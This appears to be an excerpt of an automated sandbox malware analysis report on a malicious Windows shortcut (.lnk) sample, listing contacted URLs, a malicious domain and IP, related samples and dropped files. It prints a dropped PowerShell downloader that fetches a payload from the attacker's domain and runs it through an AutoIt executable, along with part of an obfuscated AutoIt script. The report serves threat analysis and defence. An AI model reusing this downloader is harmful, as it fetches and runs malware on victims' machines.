                  		unknown
                  https://oneget.orgXpowershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://tiffany-careers.com/ghep2412_2LMEMPmshta.exe, 00000006.00000002.1796653110.0000021D262A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1443126363.0000019635D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://tiffany-careers.com/XKIZdXpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://tiffany-careers.com/ghep2412_2...bmshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/JGuard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2670340333.0000000000C19000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001B.00000002.2670257397.00000000008B9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.drfalse
                        		high
                        http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://tiffany-careers.cpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://go.microsoft.cpowershell.exe, 00000015.00000002.2022240307.000001E2B455F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://tiffany-careers.com/mshta.exe, 00000006.00000002.1791096545.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486287260.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784031189.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB77000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.ver)svchost.exe, 00000008.00000002.2680973778.000001E22AE85000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000008.00000003.1478698710.000001E22B000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                          		high
                                          https://tiffany-careers.com/XKIZdXAs.epowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://tiffany-careers.com/ghep2412_2ppowershell.exe, 00000005.00000002.1443126363.0000019635CF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1790844992.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://tiffany-careers.com/XKIZdXAs.expowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffany-careers.com/ghep2412_2https://tiffany-careers.com/ghep2412_2mshta.exe, 00000006.00000003.1778172376.0000021D26645000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffany-careers.com/ghep2412_2tmshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffany-careers.com/ghep2412_2...Cmshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://tiffany-careers.com/ghep2412_2smshta.exe, 00000006.00000002.1791681730.000002151DC80000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000008.00000003.1478698710.000001E22B071000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                              		high
                                              https://tiffany-careers.com/ghep2412_2nNmshta.exe, 00000006.00000002.1790635120.000002151DAC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/XKIpowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/XKIZdXAs.powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.copowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/ghep2412_24dmshta.exe, 00000006.00000002.1794143258.0000021D2068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://tiffany-careers.com/ghep2412_2Qamshta.exe, 00000006.00000002.1790635120.000002151DAE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.1443126363.0000019635D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443126363.0000019635D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://tiffany-careers.com/ghep2412_2TTC:mshta.exe, 00000006.00000003.1765184654.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://tiffany-careers.com/ghep2412_2Ppowershell.exe, 00000005.00000002.1443126363.000001963619E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://tiffany-careers.compowershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D43B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://tiffany-careers.com/ghep2412_2$global:?powershell.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://oneget.orgpowershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    147.45.49.155
                                                    		tiffany-careers.comRussian Federation
                                                    		2895FREE-NET-ASFREEnetEUfalse

                                                    Private

                                                    IP
                                                    127.0.0.1

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1581249
                                                    Start date and time:2024-12-27 09:04:15 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 4s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:31
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:n5Szx8qsFB.lnk
                                                    renamed because original name is a hash value
                                                    Original Sample Name:a1cfce4d0ce44d183b7c9c5bbce9d8f5.lnk
                                                    Detection:MAL
                                                    Classification:mal100.expl.evad.winLNK@43/71@5/2
                                                    EGA Information:
                                                    • Successful, ratio: 42.9%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 56
                                                    • Number of non-executed functions: 242
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .lnk

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 23.218.208.137, 162.159.61.3, 172.64.41.3, 199.232.214.172, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 23.195.39.65, 184.30.20.134, 23.32.238.130, 2.19.198.75, 23.32.238.163, 52.149.20.212
                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                    • Execution Graph export aborted for target mshta.exe, PID 8084 because there are no executed function
                                                    • Execution Graph export aborted for target powershell.exe, PID 7508 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 8376 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    03:05:11API Interceptor1x Sleep call for process: WMIC.exe modified
                                                    03:05:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                    03:05:18API Interceptor1x Sleep call for process: mshta.exe modified
                                                    03:05:19API Interceptor121x Sleep call for process: powershell.exe modified
                                                    03:05:36API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                    03:06:20API Interceptor1582x Sleep call for process: Guard.exe modified
                                                    03:06:40API Interceptor466x Sleep call for process: SwiftWrite.pif modified
                                                    09:05:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                    • tiffany-careers.com/PefjSkkhb.exe
                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                    • tiffany-careers.com/BFmcYQ.exe
                                                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                    • tiffany-careers.com/PefjSkkhb.exe

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    tiffany-careers.comnTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    bg.microsoft.map.fastly.netA4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                    • 199.232.214.172
                                                    vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                    • 199.232.210.172
                                                    54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                    • 199.232.214.172
                                                    C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                    • 199.232.210.172
                                                    P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                    • 199.232.214.172
                                                    Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                    • 199.232.214.172
                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    FREE-NET-ASFREEnetEU7ZAg3nl9Fu.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.166
                                                    7ZAg3nl9Fu.exeGet hashmaliciousUnknownBrowse
                                                    • 147.45.44.166
                                                    HOrW5twCLd.exeGet hashmaliciousXenoRATBrowse
                                                    • 147.45.69.75
                                                    cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                    • 147.45.44.224
                                                    qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                    • 147.45.44.131
                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                    • 147.45.44.131
                                                    Collapse.exeGet hashmaliciousLummaCBrowse
                                                    • 147.45.47.81
                                                    nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eA4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                                                    • 147.45.49.155
                                                    vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                    • 147.45.49.155
                                                    skript.batGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    msgde.exeGet hashmaliciousQuasarBrowse
                                                    • 147.45.49.155
                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                    • 147.45.49.155
                                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                    • 147.45.49.155
                                                    GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                    • 147.45.49.155
                                                    TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                    • 147.45.49.155
                                                    37f463bf4616ecd445d4a1937da06e19InExYnlM0N.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                                                    • 147.45.49.155
                                                    vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                    • 147.45.49.155
                                                    aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    installer.batGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    skript.batGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    din.exeGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    yoda.exeGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    lem.exeGet hashmaliciousVidarBrowse
                                                    • 147.45.49.155
                                                    markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                    • 147.45.49.155

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\Public\Guard.exenTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                        6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                          FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                            lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                  s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                    PkContent.exeGet hashmaliciousUnknownBrowse
                                                                      PkContent.exeGet hashmaliciousUnknownBrowse

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.8022201052773588
                                                                        Encrypted:false
                                                                        SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAQ:RJE+Lfki1GjHwU/+vVhWqpt
                                                                        MD5:E8C93AEAE65CB05FEFDF81985BC61938
                                                                        SHA1:2C150C5F91F01FE9BDCDE56326DE911FCFD2DB8A
                                                                        SHA-256:45D577D755403FBE013404215FAFD41AAAC9F135635E5FF233C95A5AA075EBE2
                                                                        SHA-512:86F27B06E0B6EAEB6D0246B5FF65829BD309B01F67A9CA2570896C2A1ACC599B61C1F6FB5CC5053835182A4A1908C9A7930212BC514FE7931A64D41AE33CA9DB
                                                                        Malicious:false
                                                                        Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0536994b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1048576
                                                                        Entropy (8bit):0.9433464116003822
                                                                        Encrypted:false
                                                                        SSDEEP:1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
                                                                        MD5:E66B2834931E49D0DA4059F7226AB5B7
                                                                        SHA1:A33F88E4B76F0ED1A32366AF15A1310467A342CC
                                                                        SHA-256:BE2A22F407213993369927D9F2424B0FDE7D8C33F17B3CCD022EAC7DB18911D9
                                                                        SHA-512:3F993BE3C39FFDB93C95B9E17EC999B0A8761E47F96C77FBE0AE17E4DD1DDBDD73D242D85E975501FFC6143CD6EC6047284EA16E447372E032DA5D41EF1850E1
                                                                        Malicious:false
                                                                        Preview:.6.K... ...............X\...;...{......................0.x...... ...{s......|7.h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.....................................1.....|7.................J{y......|7..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.08061837448566524
                                                                        Encrypted:false
                                                                        SSDEEP:3:sYeD6tqll/nqlFcl1ZUllllatWa/AllGBnX/l/Tj/k7/t:szD6cll/qlFclQ/lgtWa/A254
                                                                        MD5:E2B7B8C431C4A8B82A01BF1B1F9FB79B
                                                                        SHA1:52F540186A640AF9BBD2DF9D1DA5E1F98841C60C
                                                                        SHA-256:59FF0ACFB2FFF4C262D81718E688BDCEA40F036AFFFF12257D8CE794D44C56D8
                                                                        SHA-512:D48B5FA9FDC908CAB5319857A09A0868056706B39F1C87A775EA04535C015AB522D2A87394BE1DA3D25852CFB233E30D3924630B40AB60CE46CAEE725F6B7573
                                                                        Malicious:false
                                                                        Preview:.(.b.....................................;...{.......|7.. ...{s.......... ...{s.. ...{s.P.... ...{s.................J{y......|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\Public\Guard.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):893608
                                                                        Entropy (8bit):6.62028134425878
                                                                        Encrypted:false
                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                        Joe Sandbox View:
                                                                        • Filename: nTyPEbq9wQ.lnk, Detection: malicious, Browse
                                                                        • Filename: 7A2lfjTYNf.lnk, Detection: malicious, Browse
                                                                        • Filename: 6fW0guYpsH.lnk, Detection: malicious, Browse
                                                                        • Filename: FzmtNV0vnG.lnk, Detection: malicious, Browse
                                                                        • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                                        • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                        • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                        • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                        C:\Users\Public\PublicProfile.ps1

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\XKIZdXAs.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):493
                                                                        Entropy (8bit):5.219373319007497
                                                                        Encrypted:false
                                                                        SSDEEP:12:fZ7xFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fdxCknZ9LzjYnRSb8Cba
                                                                        MD5:6A07686CA1D212167C47D753146E2147
                                                                        SHA1:854DAFCBEAAB17DF65833F4B517E6A8132A5256C
                                                                        SHA-256:76EC46EDAA320817BC6B5E13161B2F2A0F984061E4C94B5A06D88A00F563BE2A
                                                                        SHA-512:F2F606B3303AD05303E4C0166D4F0F68C74FF71372F3A88CEA6DF515258A22970414421C408853D830B5F09B240C970BE4B30639B55CECA5DD868FFD4570C2C5
                                                                        Malicious:true
                                                                        Preview:[string]$fU5L = "https://tiffany-careers.com/ZxVMIVZIX.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                                        C:\Users\Public\Secure.au3

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                        Category:dropped
                                                                        Size (bytes):1149415
                                                                        Entropy (8bit):5.199763656099886
                                                                        Encrypted:false
                                                                        SSDEEP:12288:28V+jcfSw6xHpcFTkUCroPzZsc2gmjoiVRS9CyaQZflhM8smx8/d:qcLkpcpLCrOzZTob5JAli1
                                                                        MD5:83D3BBFFAED5F5FAD2D1C3750DCE9E97
                                                                        SHA1:6C94B2ADDC358CFC5B0071727FA9B5FB5F4EFB88
                                                                        SHA-256:9A23CA3C836B127A29112AC64B41072CF13B5C3FEA77E2A5B836514B21D7C95A
                                                                        SHA-512:EE9EEF5CCB1FFB147D500D56C90B280790A661C72A38997C7B516370F2E6ACC9BD829DF9D9959C4AD3E21C5E810BD6816FFC1547D470B72C76F46F6593E3094C
                                                                        Malicious:true
                                                                        Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                        Download File
